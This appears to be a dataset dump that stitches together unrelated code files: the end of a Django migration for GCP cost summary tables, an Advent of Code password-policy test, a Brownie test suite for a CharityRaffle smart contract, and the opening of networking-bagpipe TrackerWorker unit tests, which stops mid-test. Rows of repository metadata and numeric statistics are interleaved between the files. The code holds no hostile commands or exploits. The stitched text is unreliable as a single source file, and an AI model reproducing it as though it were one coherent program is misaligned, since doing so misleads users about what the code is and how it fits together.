options={"db_table": "reporting_gcp_cost_summary", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByAccount",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_account", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByProject",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
("project_id", models.CharField(max_length=256, unique=True)),
("project_name", models.CharField(max_length=256)),
("account_id", models.CharField(max_length=50)),
],
options={"db_table": "reporting_gcp_cost_summary_by_project", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByRegion",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("region", models.CharField(max_length=50, null=True)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_region", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByService",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
("service_id", models.CharField(max_length=256, null=True)),
("service_alias", models.CharField(blank=True, max_length=256, null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_service", "managed": False},
),
migrations.AddField(model_name="gcptagssummary", name="project_id", field=models.TextField(null=True)),
migrations.AddField(model_name="gcptagssummary", name="project_name", field=models.TextField(null=True)),
migrations.AddField(
model_name="gcptagsvalues",
name="project_ids",
field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), null=True, size=None),
),
migrations.AddField(
model_name="gcptagsvalues",
name="project_names",
field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), null=True, size=None),
),
migrations.AlterUniqueTogether(
name="gcptagssummary", unique_together={("key", "cost_entry_bill", "account_id", "project_id")}
),
]
| 52.558824 | 113 | 0.59653 | 532 | 5,361 | 5.789474 | 0.171053 | 0.057143 | 0.075974 | 0.101299 | 0.82013 | 0.748377 | 0.729545 | 0.672078 | 0.659416 | 0.623701 | 0 | 0.02048 | 0.262265 | 5,361 | 101 | 114 | 53.079208 | 0.758281 | 0.008394 | 0 | 0.708333 | 1 | 0 | 0.179902 | 0.053632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
183917ac1e7481ce6e906b9e3654634c5daf4f13 | 527 | py | Python | py/tests/test_day02.py | andrewblim/advent-of-code-2020 | dbc45b9967770f8015f3609b88873bdefcfdc28a | [
"MIT"
] | null | null | null | py/tests/test_day02.py | andrewblim/advent-of-code-2020 | dbc45b9967770f8015f3609b88873bdefcfdc28a | [
"MIT"
] | null | null | null | py/tests/test_day02.py | andrewblim/advent-of-code-2020 | dbc45b9967770f8015f3609b88873bdefcfdc28a | [
"MIT"
] | null | null | null | from .context import advent_of_code_2020
from advent_of_code_2020.day02 import *
def test_validate_policy_and_password():
assert validate_policy_and_password("1-3 a: abcde")
assert not validate_policy_and_password("1-3 b: cdefg")
assert validate_policy_and_password("2-9 c: ccccccccc")
def test_validate_policy_and_password2():
assert validate_policy_and_password2("1-3 a: abcde")
assert not validate_policy_and_password2("1-3 b: cdefg")
assert not validate_policy_and_password2("2-9 c: ccccccccc")
| 35.133333 | 64 | 0.787476 | 83 | 527 | 4.614458 | 0.325301 | 0.292428 | 0.355091 | 0.261097 | 0.710183 | 0.456919 | 0.177546 | 0.177546 | 0.177546 | 0 | 0 | 0.056522 | 0.127135 | 527 | 14 | 65 | 37.642857 | 0.776087 | 0 | 0 | 0 | 0 | 0 | 0.151803 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0.8 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
18435ad772fd56915c305b23813e73a1757d9dd7 | 14,996 | py | Python | brownie/tests/test_charity_deploy.py | SuperZooper3/CharityRaffle | cc77af4ddf77c8c72790687eed983285b019c4b2 | [
"MIT"
] | 1 | 2021-12-30T22:24:18.000Z | 2021-12-30T22:24:18.000Z | brownie/tests/test_charity_deploy.py | SuperZooper3/CharityRaffle | cc77af4ddf77c8c72790687eed983285b019c4b2 | [
"MIT"
] | null | null | null | brownie/tests/test_charity_deploy.py | SuperZooper3/CharityRaffle | cc77af4ddf77c8c72790687eed983285b019c4b2 | [
"MIT"
] | null | null | null | from scripts.helpers import get_account, smart_get_account, get_contract, fund_link, LOCAL_BLOCKCHAIN_ENVIRONMENTS
from brownie import network, accounts, config, CharityRaffle
import time
import pytest
from random import randint
ticketPrice = 0.001*10**18
exp_time, length = 0, 0
def init_values():
global exp_time, length
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
length = 10
exp_time = 5
else:
length = 240
exp_time = 120
def deploy_raffle_contract():
account = smart_get_account(0)
print("account:", account)
raffle = CharityRaffle.deploy(
exp_time,
get_contract("vrf_coordinator").address,
get_contract("link_token").address,
config["networks"][network.show_active()]["fee"],
config["networks"][network.show_active()]["keyhash"],
{'from': account},
publish_source = config["networks"][network.show_active()].get("verify", False)
)
print("Charity raffle@", raffle)
return raffle
def fake_VRF_response(raffle, requestId, value):
print("Fake VRF response")
callTx = get_contract("vrf_coordinator").callBackWithRandomness(requestId, value, raffle.address, {'from': smart_get_account(0)})
callTx.wait(1)
print("Fake VRF response done", callTx.events)
time.sleep(1)
# All of the tests here:
# - Deploy a raffle contract
# - Create a raffle
# - Buy tickets
# - Buy a ticket without paying enough
# - Keep track of the change correclty
# - Collect the change
# - Check that only the owner can collect the change
# - Test getting a refund
# - Test getting a refund when the raffle is not over
# - Test that a refund can't be gotten while the raffle is getting finished
# - Test that only the beneificary can claim the raffle
# - Test that the raffle can't be claimed before the end time
# - Test that the raffle can't be claimed after the expirey time
# - Test picking different winners
# - Test storing the ticket buyers
def test_deploy_raffle_contract():
init_values()
raffle = deploy_raffle_contract()
def test_create_raffle():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
# Act
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
assert raffle.RaffleCount() == 1
assert Dname == name
assert Dbeneficiary == smart_get_account(0)
assert Dwinner == "0x0000000000000000000000000000000000000000"
assert DstartTime < DendTime
assert DstartTime + length == DendTime
assert DstartTime <= int(time.time()) # It dosent start in the future
def test_ticket_buying():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
print(createTx.return_value)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Assert
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 1
assert raffle.GetRaffleBalance(1, smart_get_account(2)) == 2
assert raffle.GetRaffleBalance(1, smart_get_account(3)) == 5
def test_buy_ticket_without_paying_enough():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
with pytest.raises(Exception):
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice-100})
enterTx.wait(1)
def test_ticket_change_tracked():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
assert raffle.change() == 100
def test_collect_change():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
assert raffle.change() == 100
collectTx = raffle.CollectChange({'from': smart_get_account(0)})
collectTx.wait(1)
assert raffle.change() == 0
def test_only_owner_can_collect_change():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
refundTx = raffle.CollectChange({'from': smart_get_account(1)})
refundTx.wait(1)
def test_ticket_refund():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
print(length+exp_time)
time.sleep(length+exp_time)
beforeRefundEthBalance = smart_get_account(1).balance()
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 0
assert smart_get_account(1).balance() > beforeRefundEthBalance # We get some ETH back (dosent deal with gas prices)
def test_cannot_refund_before_end():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
def test_cannot_refund_while_selecting_winner():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Now we trigger the end of the raffle
print(length, network.show_active())
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
time.sleep(exp_time)
# Assert
with pytest.raises(Exception):
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
def test_only_ben_can_claim():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(1)})
claimTx.wait(1)
def test_cannot_claim_before_end():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
def test_cannot_claim_after_expired():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Now we trigger the end of the raffle and miss the expiry time
time.sleep(length+exp_time+1)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
def test_correctly_pick_winner_zero():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
# Act
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
print(length)
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle,requestId, 0)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleInfo(1))
assert Dwinner == smart_get_account(1).address
def test_correctly_pick_winner_last():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
# Act
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle,requestId, 7)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleInfo(1))
assert Dwinner == smart_get_account(3).address
def test_correctly_pick_winner_big():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
# Act
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
fake_VRF_response(raffle,requestId, 800)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
print(raffle.GetRaffleTicketInfo(1))
assert Dwinner == smart_get_account(1).address
def test_correctly_pick_winner_random():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
requestId = claimTx.events['RequestRandomness']['requestId']
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
value = randint(0,100000)
fake_VRF_response(raffle,requestId, value)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
assert Dwinner != "0x0000000000000000000000000000000000000000"
# Test that the ticket holders are correclty stored
def test_correctly_store_ticket_holders():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Assert
Dname, DstartTime, DendTime, DticketCount, DticketPrice = raffle.GetRaffleTicketInfo(1)
assert DticketCount == 8
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 1
assert raffle.GetRaffleBalance(1, smart_get_account(2)) == 2
assert raffle.GetRaffleBalance(1, smart_get_account(3)) == 5 | 38.352941 | 133 | 0.691985 | 1,901 | 14,996 | 5.281957 | 0.098369 | 0.079673 | 0.118016 | 0.111642 | 0.791853 | 0.768549 | 0.747933 | 0.74385 | 0.728613 | 0.728613 | 0 | 0.031321 | 0.182449 | 14,996 | 391 | 134 | 38.352941 | 0.787684 | 0.090091 | 0 | 0.709898 | 0 | 0 | 0.066107 | 0.006191 | 0 | 0 | 0.006191 | 0 | 0.078498 | 1 | 0.071672 | false | 0 | 0.017065 | 0 | 0.09215 | 0.037543 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a1219f3c76316365e985614b5bda06b494c56bf4 | 38,796 | py | Python | networking_bagpipe/tests/unit/bagpipe_bgp/test_tracker_worker.py | mail2nsrajesh/networking-bagpipe | e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2 | [
"Apache-2.0"
] | null | null | null | networking_bagpipe/tests/unit/bagpipe_bgp/test_tracker_worker.py | mail2nsrajesh/networking-bagpipe | e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2 | [
"Apache-2.0"
] | null | null | null | networking_bagpipe/tests/unit/bagpipe_bgp/test_tracker_worker.py | mail2nsrajesh/networking-bagpipe | e802ead8e3b4cecab6b65a9e441c3cf762bfbbb2 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# encoding: utf-8
# Copyright 2014 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module:: test_tracker_worker
:synopsis: a module that defines several test cases for the tracker_worker
module.
In particular, unit tests for TrackerWorker class.
Setup: Run TrackerWorker instance.
TearDown: Stop TrackerWorker instance.
TrackerWorker is in charge to receive RouteEvent from RouteTableManager.
A RouteEvent contains an event type ADVERTIZE or WITHDRAW, and a RouteEntry.
TrackerWorker should call _new_best_route and/or _best_route_removed if the
new RouteEntry changes the current list of the known best routes. The
current list of the known best routes, which can be modified by the new
RouteEntry, is selected thanks to the tracked_entry associated to the new
RouteEntry. The tracked_entry is obtained thanks to _route2TrackedEntry.
_compare_routes is used to compare 2 RouteEntry.
Unit tests are organized as follow:
TestA: basic tests, advertise several routes with different NLRI and same or
different sources
TestB: same routes (with _compare_routes) announced by different sources
TestC: different routes (with _compare_routes) announced by different
sources, TrackerWorker selects the best route.
TestD: ECMP routes or same routes (with _compare_routes), same source, same
attributes except NextHop
TestE: different routes (with compare_routes announced by the same source
with replaced_route not none
"""
import copy
import threading
import mock
import testtools
from networking_bagpipe.bagpipe_bgp import engine
from networking_bagpipe.bagpipe_bgp.engine import exa
from networking_bagpipe.bagpipe_bgp.engine import tracker_worker
from networking_bagpipe.bagpipe_bgp.engine import worker
from networking_bagpipe.tests.unit.bagpipe_bgp import base as t
def _test_compare_routes(self, route_a, route_b):
if (route_a.nlri != route_b.nlri or
route_a.afi != route_b.afi or
route_a.safi != route_b.safi):
raise Exception('Bug: compare_routes called with routes having '
'different nlri/afi/safi')
else:
if (route_a.attributes.sameValuesAs(route_b.attributes)):
return 0
else:
lp_a = route_a.attributes[exa.Attribute.CODE.LOCAL_PREF].localpref
nh_a = route_a.attributes[exa.Attribute.CODE.NEXT_HOP].top()
lp_b = route_b.attributes[exa.Attribute.CODE.LOCAL_PREF].localpref
nh_b = route_b.attributes[exa.Attribute.CODE.NEXT_HOP].top()
if nh_a != nh_b and lp_a == lp_b:
# ECMP routes
return 0
else:
return (lp_a > lp_b) - (lp_b > lp_a)
class TrackerWorkerThread(tracker_worker.TrackerWorker, threading.Thread):
def __init__(self):
threading.Thread.__init__(self, name='TrackerWorkerThread')
self.setDaemon(True)
tracker_worker.TrackerWorker.__init__(
self, mock.Mock(), 'TrackerWorker', _test_compare_routes)
def stop(self):
self._please_stop.set()
self._queue.put(worker.STOP_EVENT)
self._stopped()
def _route_2_tracked_entry(self, route):
return route.nlri
# the definitions below are needed because TrackerWorker is an abstract
# class
def _new_best_route(self, entry, route):
pass
def _best_route_removed(self, entry, route, last):
pass
class TestTrackerWorker(testtools.TestCase, t.BaseTestBagPipeBGP):
def setUp(self):
super(TestTrackerWorker, self).setUp()
self.tracker_worker = TrackerWorkerThread()
self.tracker_worker.start()
self.set_event_target_worker(self.tracker_worker)
self._calls = []
def tearDown(self):
super(TestTrackerWorker, self).tearDown()
self.tracker_worker.stop()
self.tracker_worker.join()
def _check_calls(self, call_args_list, expected_list, ordered=True):
# use to check the calls to new_best_route and best_route_removed
# against a list of expected calls
expected_list_copy = []
# clear source field in the routes in expected calls
# because the new_best_route and best_route_removed do not receive
# routes with this field set
for expected in expected_list:
route = copy.copy(expected[1])
route.source = None
if len(expected) == 2:
expected_list_copy.append((expected[0], route))
elif len(expected) == 3:
expected_list_copy.append((expected[0], route, expected[2]))
else:
assert(False)
if not ordered:
expected_list_copy = sorted(expected_list_copy,
key=lambda x: repr(x))
call_args_list = sorted(call_args_list,
key=lambda x: repr(x[0]))
for ((call_args, _), expected) in zip(call_args_list,
expected_list_copy):
self.assertEqual(expected[0], call_args[0], 'Bad prefix')
observed_route_entry = call_args[1]
expected_route_entry = expected[1]
self.assertEqual(expected_route_entry, observed_route_entry)
if len(expected) >= 3:
self.assertEqual(expected[2], call_args[2],
"wrong 'last' flag")
def _call_list(self, method):
def side_effect(*args, **kwargs):
self._append_call(method)
return side_effect
def test_a1_different_nlri_same_source(self):
# A source A advertises and withdraws routes for different NLRI.
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# Only 1 source A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A advertises a route for NLRI2
route_nlri2a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI2, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A withdraws the route for NLRI2
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI2, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(2, self.tracker_worker._new_best_route.call_count,
'2 new best routes: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI2, route_nlri2a.route_entry)])
self.assertEqual(2, self.tracker_worker._best_route_removed.call_count,
'2 old routes removed: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry, True),
(t.NLRI2, route_nlri2a.route_entry, True)])
def test_a2_different_nlri_different_source(self):
# 2 sources A and B advertise and withdraw routes for different NLRI.
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 2 sources: A and B
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
worker_b = worker.Worker(mock.Mock(), 'worker.Worker-B')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B advertises a route for NLRI2
route_nlri2B = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI2, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Source A withdraws the route for NLRI1
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source B withdraws the route for NLRI2
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI2, [t.RT1, t.RT2],
worker_b, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(2, self.tracker_worker._new_best_route.call_count,
'2 new_best_route calls: 1 for NLRI1 and 1 for NLRI2')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI2, route_nlri2B.route_entry)])
self.assertEqual(2, self.tracker_worker._best_route_removed.call_count,
'2 best_route_removed calls: 1 for NLRI1 and 1 for '
'NLRI2')
self._check_calls(
self.tracker_worker._best_route_removed.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry, True),
(t.NLRI2, route_nlri2B.route_entry, True)])
def test_a3_same_nlri_same_source(self):
# A source A advertises the same route for the same NLRI
# Mock objects
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A advertises a route for NLRI1
route_nlri1a = self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Source A advertises the same route for NLRI1
self._new_route_event(
engine.RouteEvent.ADVERTISE, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls and arguments list to _new_best_route and
# _best_route_removed
self.assertEqual(1, self.tracker_worker._new_best_route.call_count,
'expected 1 new_best_route call for NLRI1')
self._check_calls(self.tracker_worker._new_best_route.call_args_list,
[(t.NLRI1, route_nlri1a.route_entry),
(t.NLRI1, route_nlri1a.route_entry)])
def test_a4_withdraw_nlri_not_known(self):
# A source A withdraws a route that does not exist.
self.tracker_worker._new_best_route = mock.Mock()
self.tracker_worker._best_route_removed = mock.Mock()
# 1 source: A
worker_a = worker.Worker(mock.Mock(), 'worker.Worker-A')
# Source A withdraws a route for NLRI1 which is not known by
# tracker_worker
self._new_route_event(
engine.RouteEvent.WITHDRAW, t.NLRI1, [t.RT1, t.RT2],
worker_a, t.NH1, 100)
# Check calls to _new_best_route and _best_route_removed
self.assertEqual(0, self.tracker_worker._new_best_route.call_count,
'new_best_route should not have been called')
